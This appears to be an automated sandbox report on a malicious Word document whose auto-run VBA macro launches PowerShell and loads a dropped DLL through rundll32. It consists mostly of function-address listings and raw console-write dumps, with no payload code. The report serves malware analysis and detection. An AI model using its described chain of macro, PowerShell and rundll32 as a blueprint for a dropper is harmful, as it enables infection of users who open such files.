Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00751E14 8_2_00751E14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00357D7D 9_2_00357D7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003589F6 9_2_003589F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00347E34 9_2_00347E34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00358831 9_2_00358831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034903F 9_2_0034903F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034A83A 9_2_0034A83A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035C424 9_2_0035C424
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034DC2F 9_2_0034DC2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00342628 9_2_00342628
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344A2B 9_2_00344A2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00348816 9_2_00348816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035F411 9_2_0035F411
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034F813 9_2_0034F813
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034D013 9_2_0034D013
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034421E 9_2_0034421E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00347605 9_2_00347605
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034620A 9_2_0034620A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034C07D 9_2_0034C07D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00358668 9_2_00358668
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00345856 9_2_00345856
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00341658 9_2_00341658
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00351259 9_2_00351259
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034D44C 9_2_0034D44C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035C04C 9_2_0035C04C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00354E4B 9_2_00354E4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034704B 9_2_0034704B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003456B3 9_2_003456B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00355AB8 9_2_00355AB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00345EB9 9_2_00345EB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035CAA0 9_2_0035CAA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344EA1 9_2_00344EA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00348CA3 9_2_00348CA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035C6AD 9_2_0035C6AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00354693 9_2_00354693
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349AE1 9_2_00349AE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003542E2 9_2_003542E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003494EC 9_2_003494EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034C6EF 9_2_0034C6EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035DEE8 9_2_0035DEE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034D0DE 9_2_0034D0DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003506C2 9_2_003506C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00349CC8 9_2_00349CC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035D2CB 9_2_0035D2CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035D530 9_2_0035D530
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034213E 9_2_0034213E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035BF25 9_2_0035BF25
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035DB25 9_2_0035DB25
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034492A 9_2_0034492A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00355115 9_2_00355115
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034CF11 9_2_0034CF11
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035231B 9_2_0035231B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034A176 9_2_0034A176
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00351B71 9_2_00351B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00357570 9_2_00357570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00353D7C 9_2_00353D7C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035DD78 9_2_0035DD78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00358F65 9_2_00358F65
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00352965 9_2_00352965
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00350F6D 9_2_00350F6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035676B 9_2_0035676B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00356B45 9_2_00356B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034CB42 9_2_0034CB42
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035654F 9_2_0035654F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00343D4E 9_2_00343D4E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035EDB9 9_2_0035EDB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003599A4 9_2_003599A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00355DAA 9_2_00355DAA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035E19F 9_2_0035E19F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003537F4 9_2_003537F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035B3FE 9_2_0035B3FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00345BE1 9_2_00345BE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00342DEE 9_2_00342DEE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035B1D2 9_2_0035B1D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00344BDE 9_2_00344BDE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00346BC0 9_2_00346BC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003573C0 9_2_003573C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003577C0 9_2_003577C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00359DC0 9_2_00359DC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0035CDCC 9_2_0035CDCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0034ADCE 9_2_0034ADCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003593C9 9_2_003593C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020BC21 9_2_0020BC21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F8217 9_2_001F8217
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020502C 9_2_0020502C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020C83F 9_2_0020C83F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F923C 9_2_001F923C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00203C07 9_2_00203C07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F542D 9_2_001F542D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020C014 9_2_0020C014
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F4C27 9_2_001F4C27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F9055 9_2_001F9055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FC652 9_2_001FC652
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00203856 9_2_00203856
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FBC63 9_2_001FBC63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020D45C 9_2_0020D45C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F8A60 9_2_001F8A60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F3E9E 9_2_001F3E9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002060B9 9_2_002060B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FC485 9_2_001FC485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002010BB 9_2_002010BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00204689 9_2_00204689
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FC0B6 9_2_001FC0B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F16B2 9_2_001F16B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020188F 9_2_0020188F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020B499 9_2_0020B499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020D099 9_2_0020D099
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002004E1 9_2_002004E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00206AE4 9_2_00206AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002010E5 9_2_002010E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020D2EC 9_2_0020D2EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002032F0 9_2_002032F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002072F1 9_2_002072F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F32C2 9_2_001F32C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00205AC3 9_2_00205AC3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00201ED9 9_2_00201ED9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002084D9 9_2_002084D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00205CDF 9_2_00205CDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020E32D 9_2_0020E32D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00206934 9_2_00206934
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00206D34 9_2_00206D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020893D 9_2_0020893D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F6134 9_2_001F6134
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020D713 9_2_0020D713
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00208F18 9_2_00208F18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020531E 9_2_0020531E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00207F6A 9_2_00207F6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F5155 9_2_001F5155
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F4152 9_2_001F4152
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020A972 9_2_0020A972
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020C340 9_2_0020C340
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F577E 9_2_001F577E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020A746 9_2_0020A746
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F6B79 9_2_001F6B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F2362 9_2_001F2362
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F3F9F 9_2_001F3F9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F1B9C 9_2_001F1B9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00207DA5 9_2_00207DA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F7D8A 9_2_001F7D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FED87 9_2_001FED87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FC587 9_2_001FC587
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002043BF 9_2_002043BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F65BF 9_2_001F65BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020E985 9_2_0020E985
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F85B3 9_2_001F85B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F9DAE 9_2_001F9DAE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F9DAD 9_2_001F9DAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F73A8 9_2_001F73A8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020B998 9_2_0020B998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FD1A3 9_2_001FD1A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F0BCC 9_2_001F0BCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F4DCA 9_2_001F4DCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FC9C0 9_2_001FC9C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020B5C0 9_2_0020B5C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FB5F1 9_2_001FB5F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00207BDC 9_2_00207BDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037303C 9_2_0037303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00381E14 9_2_00381E14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078704B 10_2_0078704B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078903F 10_2_0078903F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078DC2F 10_2_0078DC2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078620A 10_2_0078620A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00789CC8 10_2_00789CC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00797D7D 10_2_00797D7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00793D7C 10_2_00793D7C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078A176 10_2_0078A176
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0079654F 10_2_0079654F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078492A 10_2_0078492A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0079B3FE 10_2_0079B3FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007937F4 10_2_007937F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007989F6 10_2_007989F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007993C9 10_2_007993C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078C07D 10_2_0078C07D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00798668 10_2_00798668
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00781658 10_2_00781658
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00791259 10_2_00791259
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00785856 10_2_00785856
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00794E4B 10_2_00794E4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078D44C 10_2_0078D44C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0079C04C 10_2_0079C04C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078A83A 10_2_0078A83A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00798831 10_2_00798831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00787E34 10_2_00787E34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00782628 10_2_00782628
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00784A2B 10_2_00784A2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0079C424 10_2_0079C424
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078421E 10_2_0078421E
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Arch_2021_717-1562532.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module A5ate73kc6cw5njy, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: Arch_2021_717-1562532.doc OLE indicator, VBA macros: true
PE file contains strange resources
Source: N49I.dll.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@28/8@1/4
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$ch_2021_717-1562532.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD799.tmp Jump to behavior
Source: Arch_2021_717-1562532.doc OLE indicator, Word Document stream: true
Source: Arch_2021_717-1562532.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ..&.........*........................... .........................&.......&.............#.........................&.....h.......5kU.......&..... Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ............*...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......(.&.....L.................&..... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K......h.Q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v.....................o.j......................J.............}..v.....4t.....0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................o.j..... J...............J.............}..v....p5t.....0.u.............h.Q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v.....................o.j......................J.............}..v....0Bt.....0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................o.j....H.Q...............J.............}..v.....Bt.....0.u...............Q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....#................l.j......................J.............}..v....pyu.....0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#................l.j..... J...............J.............}..v.....zu.....0.u...............Q............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....7...............T..j....0IQ...............J.............}..v....x.......0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j....0.................J.............}..v............0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....C...............T..j....0IQ...............J.............}..v....x.......0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j....0.................J.............}..v............0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....O...............T..j....0IQ...............J.............}..v....x.......0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j....0.................J.............}..v............0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.u..............EQ.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[..................j......................J.............}..v............0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.2.............}..v............0.u..............EQ.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g..................j......................J.............}..v....H.......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....s...............T..j....0IQ...............J.............}..v............0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j......................J.............}..v....H.......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................J.............}..v....H.......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v............0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................J.............}..v....H ......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v.....'......0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....'................J.............}..v....H(......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v...../......0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j...../................J.............}..v....H0......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v.....7......0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....7................J.............}..v....H8......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v.....?......0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....?................J.............}..v....H@......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....................T..j....0IQ...............J.............}..v.....G......0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....G................J.............}..v....HH......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....'...............T..j....0IQ...............J.............}..v.....O......0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j.....O................J.............}..v....HP......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....3...............T..j....0IQ...............J.............}..v.....W......0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j.....W................J.............}..v....HX......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....?...............T..j....0IQ...............J.............}..v....._......0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j....._................J.............}..v....H`......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....K...............T..j....0IQ...............J.............}..v.....g......0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j.....g................J.............}..v....Hh......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....W...............T..j....0IQ...............J.............}..v.....o......0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j.....o................J.............}..v....Hp......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....c...............T..j....0IQ...............J.............}..v.....w......0.u...............&............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j.....w................J.............}..v....Hx......0.u..............FQ............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..&.............y=.v....o...............T..j....0IQ...............J.............}..v............0.u...............&............................. Jump to behavior
